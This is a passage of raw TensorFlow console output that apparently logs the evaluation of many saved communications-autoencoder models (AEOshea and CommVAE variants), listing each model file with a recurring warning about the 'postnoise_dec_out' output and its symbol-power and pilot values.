The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0269036 Model: 4.0269036 1.8081817708498318 1.2316492965078727 Pilots : [1.00335732 1.00335732]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061018.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.023539 Model: 4.023539 1.8419103497359022 1.1859632895438887 Pilots : [1.00293807 1.00293807]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061447.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.010163 Model: 4.010163 1.8275770029784644 1.2006340012787091 Pilots : [1.00126955 1.00126955]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321061915.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.03127 Model: 4.03127 1.883422630089833 1.1364395012494908 Pilots : [1.00390114 1.00390114]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321062344.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.013646 Model: 4.013646 1.8087448134324575 1.2268302658897514 Pilots : [1.00170431 1.00170431]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321062800.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0307713 Model: 4.0307713 1.8422339010589177 1.1876777291802805 Pilots : [1.00383904 1.00383904]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321063223.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.020724 Model: 4.020724 1.861862196416091 1.1598696238739292 Pilots : [1.00258713 1.00258713]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321063657.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0244484 Model: 4.0244484 1.840581079387669 1.187945334489249 Pilots : [1.00305139 1.00305139]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321064118.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0033026 Model: 4.0033026 1.8361068213913785 1.1874696750731897 Pilots : [1.00041274 1.00041274]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321064540.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.005479 Model: 4.005479 1.8138575984179783 1.2174414010683823 Pilots : [1.00068462 1.00068462]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065004.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.02326 Model: 4.02326 1.8552669530261519 1.1688675298412703 Pilots : [1.0029033 1.0029033]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065427.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.001155 Model: 4.001155 1.8526649333797203 1.1657128988048429 Pilots : [1.00014435 1.00014435]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065851.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.996416 Model: 3.996416 1.7956279596636346 1.2394755969041482 Pilots : [0.99955191 0.99955191]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321070309.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.007162 Model: 4.007162 1.8448767246111506 1.1773408339552747 Pilots : [1.00089486 1.00089486]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321070735.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.047037 Model: 4.047037 1.8524358755599124 1.1793720245220862 Pilots : [1.00586246 1.00586246]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321071200.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.00617 Model: 4.00617 1.86976866985588 1.145918142954617 Pilots : [1.00077093 1.00077093]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321071623.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025215 Model: 4.025215 1.8924489590227345 1.1239338426942236 Pilots : [1.00314694 1.00314694]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072036.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0125704 Model: 4.0125704 1.8154856709021998 1.2174104128446532 Pilots : [1.00157007 1.00157007]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072447.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.026843 Model: 4.026843 1.8259696021541327 1.2077515916242507 Pilots : [1.00334977 1.00334977]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072904.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0389285 Model: 4.0389285 1.8800514723427248 1.14268542184117 Pilots : [1.00485428 1.00485428]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321073321.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.002658 Model: 4.002658 1.85456791909066 1.1637588224214421 Pilots : [1.00033218 1.00033218]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321073736.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0165157 Model: 4.0165157 1.8336104700082971 1.1946352136165732 Pilots : [1.00206234 1.00206234]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321074148.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0000906 Model: 4.0000906 1.8085962348287208 1.2228877177454474 Pilots : [1.00001132 1.00001132]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321074607.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.041437 Model: 4.041437 1.8470325019139568 1.1846409848093262 Pilots : [1.0051663 1.0051663]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075017.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.026678 Model: 4.026678 1.7934384399359313 1.251912463321814 Pilots : [1.00332922 1.00332922]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075439.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0006523 Model: 4.0006523 1.8196845249845954 1.2081993730928187 Pilots : [1.00008154 1.00008154]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075859.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025361 Model: 4.025361 1.846886871141046 1.1801147894049215 Pilots : [1.00316512 1.00316512]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321080315.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0253434 Model: 4.0253434 1.8612192197476485 1.1620046888336588 Pilots : [1.00316293 1.00316293]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321080732.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0063267 Model: 4.0063267 1.8556321009606167 1.1634898661824455 Pilots : [1.00079052 1.00079052]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321081147.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.018792 Model: 4.018792 1.8218698420233155 1.2107677700046606 Pilots : [1.00234627 1.00234627]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321081605.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0246162 Model: 4.0246162 1.88529731823307 1.1323085220771865 Pilots : [1.00307231 1.00307231]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082020.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022691 Model: 4.022691 1.8217843780395888 1.2120560454309162 Pilots : [1.00283234 1.00283234]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082435.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0239677 Model: 4.0239677 1.8197517896509243 1.2151508088998775 Pilots : [1.00299149 1.00299149]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082851.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0190573 Model: 4.0190573 1.8115719968041795 1.2246528504031482 Pilots : [1.00237933 1.00237933]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321083314.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0126243 Model: 4.0126243 1.8268143446593972 1.2023742549693606 Pilots : [1.00157679 1.00157679]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321083732.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0166383 Model: 4.0166383 1.843216213607343 1.182252276272981 Pilots : [1.00207763 1.00207763]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321084207.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.030143 Model: 4.030143 1.8041835990776798 1.238109260546918 Pilots : [1.00376078 1.00376078]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321084629.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0024295 Model: 4.0024295 1.8914140454700872 1.1187948788791258 Pilots : [1.00030364 1.00030364]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085050.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0235624 Model: 4.0235624 1.7948200256726217 1.2490186735454212 Pilots : [1.00294098 1.00294098]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085515.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0094414 Model: 4.0094414 1.814767576641543 1.2174239606145685 Pilots : [1.00117948 1.00117948]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085938.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022017 Model: 4.022017 1.8468679088641413 1.1791586249790467 Pilots : [1.00274835 1.00274835]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321090355.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.01322 Model: 4.01322 1.8752937719396838 1.141180461339508 Pilots : [1.00165112 1.00165112]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321090819.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.993683 Model: 3.993683 1.775520453766357 1.2668413812140367 Pilots : [0.99921008 0.99921008]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321091229.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.99748 Model: 3.99748 1.8340267272725506 1.1884337308234605 Pilots : [0.99968494 0.99968494]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321091641.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0085154 Model: 4.0085154 1.8457842606389663 1.176580578040224 Pilots : [1.00106385 1.00106385]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321092101.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.007532 Model: 4.007532 1.8876442247433065 1.1247000760156827 Pilots : [1.00094107 1.00094107]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230025.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1858146 Model: 1.1858146 1.0718046452286907 1.0322515180735543 Pilots : [0.54447558 0.54447558]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230501.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1638489 Model: 1.1638489 1.0978789855732851 0.9655786336935741 Pilots : [0.53940914 0.53940914]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230929.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1584036 Model: 1.1584036 1.0811247782473081 0.9910789900138589 Pilots : [0.53814581 0.53814581]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316231417.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1611385 Model: 1.1611385 1.0674488155697848 1.0190369198235298 Pilots : [0.53878069 0.53878069]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316231911.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1837598 Model: 1.1837598 1.073667008470956 1.0268910620912428 Pilots : [0.54400363 0.54400363]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316232347.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1674697 Model: 1.1674697 1.0789229644634366 1.0029164592984576 Pilots : [0.54024757 0.54024757]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316232814.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1458226 Model: 1.1458226 1.069209186547585 1.0022868620453316 Pilots : [0.53521553 0.53521553]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316233315.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1572412 Model: 1.1572412 1.0433416579299928 1.0630918787645056 Pilots : [0.53787574 0.53787574]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316233803.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.167278 Model: 1.167278 1.0839504041717625 0.9934716904895743 Pilots : [0.54020321 0.54020321]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316234234.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1428549 Model: 1.1428549 1.0749188559618392 0.989098955411168 Pilots : [0.53452197 0.53452197]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316234659.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1570493 Model: 1.1570493 1.083332387456133 0.9858898810811678 Pilots : [0.53783113 0.53783113]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316235205.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1702943 Model: 1.1702943 1.0789232272203517 1.0053423987464105 Pilots : [0.5409007 0.5409007]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316235652.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.196095 Model: 1.196095 1.0616730645885306 1.0611678235322488 Pilots : [0.54683064 0.54683064]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317000124.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1517587 Model: 1.1517587 1.0564357462926233 1.0319895858394734 Pilots : [0.5366001 0.5366001]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317000559.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1863053 Model: 1.1863053 1.1007440722417905 0.9790925686829618 Pilots : [0.54458821 0.54458821]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317001105.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1781274 Model: 1.1781274 1.0460425152352857 1.076697208171678 Pilots : [0.54270789 0.54270789]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317001549.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1502329 Model: 1.1502329 1.071896448588126 1.001106141559045 Pilots : [0.53624456 0.53624456]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317002021.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1360887 Model: 1.1360887 1.0797701591225497 0.9744276733380797 Pilots : [0.53293732 0.53293732]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317002459.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1835482 Model: 1.1835482 1.0716773185865165 1.0305234415906992 Pilots : [0.54395501 0.54395501]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003001.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1665043 Model: 1.1665043 1.0745964764821783 1.0101724177779579 Pilots : [0.54002413 0.54002413]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003439.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1798611 Model: 1.1798611 1.0820058982651755 1.0077936433931676 Pilots : [0.54310705 0.54310705]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003907.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1716278 Model: 1.1716278 1.0827005439215756 0.9994773189533803 Pilots : [0.54120878 0.54120878]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317004355.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1636987 Model: 1.1636987 1.0717776351677886 1.013050647464568 Pilots : [0.53937433 0.53937433]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317004857.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1649482 Model: 1.1649482 1.062008601385914 1.032881635115647 Pilots : [0.53966384 0.53966384]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317005327.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1575803 Model: 1.1575803 1.0623430762049362 1.0257027677828066 Pilots : [0.53795452 0.53795452]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317005759.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1654664 Model: 1.1654664 1.077509201792652 1.003824503111421 Pilots : [0.53978385 0.53978385]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317010249.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1760485 Model: 1.1760485 1.0786472719312516 1.0108025756010932 Pilots : [0.54222885 0.54222885]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317010738.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1656138 Model: 1.1656138 1.0522411641836467 1.0527471983367611 Pilots : [0.53981797 0.53981797]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317011202.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1637664 Model: 1.1637664 1.087940204137969 0.9832314373294148 Pilots : [0.53939002 0.53939002]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317011641.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1535736 Model: 1.1535736 1.0911738125658226 0.9688520249439585 Pilots : [0.53702273 0.53702273]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317012148.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1667856 Model: 1.1667856 1.077582677015827 1.004823671306762 Pilots : [0.54008925 0.54008925]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317012620.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1600156 Model: 1.1600156 1.0701507847342575 1.01291703434125 Pilots : [0.5385201 0.5385201]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317013058.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1575218 Model: 1.1575218 1.0940208313743855 0.9671147620235342 Pilots : [0.53794095 0.53794095]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317013539.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1387819 Model: 1.1387819 1.0725505839825102 0.989931150120344 Pilots : [0.53356862 0.53356862]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014046.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. 
